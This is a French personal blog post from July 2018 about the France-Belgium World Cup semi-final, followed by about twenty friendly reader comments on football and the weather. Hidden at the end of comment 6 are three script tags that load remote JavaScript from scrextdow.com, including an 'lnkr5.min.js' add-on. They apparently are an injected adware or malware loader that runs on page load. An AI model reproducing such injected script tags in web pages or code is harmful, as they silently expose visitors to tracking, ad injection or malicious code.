• Mardi 10 Juillet

    Bonjour tout le monde et les autres aussi.

    Je ne suis pas particulièrement fan de foot, mais ce soir, je ne vais pas louper ce match " France-Belgique".

    Nous avons beaucoup d'ami(e)s Belges et si c'était possible, j'aurais aimé un match nul; mais il faut qu'une équipe gagne.

    Alors je souhaite bonne chance à nos deux pays.

    Mardi 10 Juillet

    La Marseillaise

    Mardi 10 Juillet

    La Brabançonne

    Mardi 10 Juillet


  • Commentaires

    1
    Mardi 10 Juillet 2018 à 04:12

    Bonjour  Jacques

    Surtout ne rien changer,

    continuité du régime ciel bleu ,

    grand soleil et bonne chaleur.

    A consommer sans modération,

    mais prudence quand même!

    ne pas oublier de se désaltérer

    et de ne pas trop s'exposer aux rayons

    bonne journée de mardi

    AmiCalement

    . * J-G-R-C-201*.

    2
    Mardi 10 Juillet 2018 à 06:55

    bonjour Jacques et Maria
    pour moi que le meilleur gagne ,
      La météo annonce une journée ensoleillée mais avec plus de fraîcheur
    Je vous souhaite de passer une agréable journée
    bisous à vous deux

    3
    Mardi 10 Juillet 2018 à 07:11

    ... mais oui, que le meilleur gagne!

    Je n'aurai pas besoin de regarder, les cris des voisins suffiront...

    Bonne journée à tous les deux,

    Bises de Mireille du Sablon

    4
    Mardi 10 Juillet 2018 à 07:15

    Bonjour vous 2 !

    Ah non pas match nul, les tirs aux buts j'ai horreur de çà hihi !

    Mais vive la France ... j'suis chauvine normal !

    5
    Mardi 10 Juillet 2018 à 07:21

      bonjour jacques

    dans les infirmier qui viens soigné ma femme bcp de français

    comme tu dis que le meilleur gagne nous on a pas un euro en plus en poche

    ici à liège pendant un mois il y a un village gaulois et le 14 juillet un feu d'artifice

    je te souhaite une bonne journée

    amitié et bisous à maria

    claude

    6
    Mardi 10 Juillet 2018 à 07:47

    Bonjour Jacques

    Vive la France hihihi

    me voilà de retour le PC fonctionne mieux ouffff

     

    il fait une chaleur étouffante je reste à l'ombre

     

    car j'ai du mal a supporter maintenant...

     

    passe une très bonne journée

     

    à demain

    ♥♥ Amitié.Bisous.Colette ♥♥ <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>

    7
    Mardi 10 Juillet 2018 à 07:49
    C'est ce soir à 20h30. Je le regarderai aussi.
    Bises et bon mardi à vous deux
    8
    Mardi 10 Juillet 2018 à 08:27

    Bonjour Jacques .

    Très jolie article je suis pas très fan de foot moi non plus je préfère le tour de France  .

    oui  que le meilleur gagne .

    Je te souhaite un bon mardi .

    9
    Mardi 10 Juillet 2018 à 08:35

    Bonjour Jacques

    je ne suis pas foot non  plus mais pas match nul il faut qu'une équipe gagne alors que ce soit la meilleurs je n'aime pas ces tire au but. douce journée bisous 

    Marlène

    10
    Mardi 10 Juillet 2018 à 10:05

    Bonne journée Jacques.

    J'espère que l'on assistera à un beau match.

    11
    Mardi 10 Juillet 2018 à 10:40

    Bonjour Jacques et Maria 

    Je vois Jacques que tu es comme moi partagé entre la France et la Belgique , ma meilleure amie est Belge et habite Charleroi , et j'ai un cousin germain Belge qui habite Bruxelle , aussi je suis comme toi , que le meilleur gagne ! 

    Bonne journée à vous deux 

    Gros bisous Hélène

     

    12
    Mardi 10 Juillet 2018 à 16:52

    Coucou Jacques , oui l' essentiel est que ce soit une belle rencontre pleine d'action ! . Je ne regarderai pas tout le match pour ne pas m'endormir he !! . Bonne soirée devant la télé , bisous , escapade , 

    13
    Mardi 10 Juillet 2018 à 17:02

    coucou se soir juste 3 petits mots ...

     "vive la France" ....

    oui oui je suis belge mais j'ai encore le droit de supporter qui je veux!

    a demain!

    14
    Mardi 10 Juillet 2018 à 17:03

    Belle fin de journée Jacques

     

    Toujours du soleil et de la chaleur chez nous, ne nous plaignions pas les beaux jours ne durent pas

    A nous de prendre les précautions nécessaires pour ne pas trop en souffrir.

    Les nuits sont encore fraiches, si bien qu'on peut bien se reposer

    Je te souhaite un très heureux mardi

    Personnellement je n'aime pas le foot, mais malgré tout en est pris dans l'engrenage et comme toi je dis " que le meilleur gagne"

    amitié et bises  à vous deux   rebecca

    15
    Mardi 10 Juillet 2018 à 17:26

    Bonsoir mes chers amis Maria et Jacques

    Je suis pour la France mais j'aime bien aussi la Belgique alors je dis "que le meilleur gagne" car il faut un vainqueur.

    Juste un petit coucou de ma petite île intense pour te souhaiter une douce soirée.

    Je t'envoie ainsi qu'à Maria une envolée de gros bisous d'amitié de la Réunion.

    16
    Mardi 10 Juillet 2018 à 17:48

    bonsoir a vous 2!!

    ha ,c'est bien si tu peux retourner taper sur le clavier,et a l'avenir,lol fait attention!

    et comme tu dis que le meilleur gagne!

    a vendredi et bisous

    17
    Mardi 10 Juillet 2018 à 17:52

    Salut,

    Je pense que ce soir l"audimat va exploser...

    Le ciel est nuageux.

    La température est ce qu'il faut pour le jardin.

    Mais toujours pas de pluie.

    Bonne journée

    18
    Mardi 10 Juillet 2018 à 18:14

    Bonsoir jacques
    La journée a été un peu plus fraîche
    ça ne fait pas de mal..Je te souhaite
    une bonne soirée et douce nuit..Bisous.
    Pas fan de foot ...tissia

    19
    Mardi 10 Juillet 2018 à 20:27

    Le principal est d'avoir un beau match

    Que le meilleur gagne

    Bonne soirée et bisous à tous les deux

    20
    Mercredi 11 Juillet 2018 à 02:03

    Bonjour Jacques&Maria

    bravo la France

     

    Avec amitiés

     

    René de Chine

     

    21
    Mercredi 11 Juillet 2018 à 07:23

    C'est super Jacques on a gagné, j'ai regardé aussi le match.

    .Bon mercredi gros bisous 



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :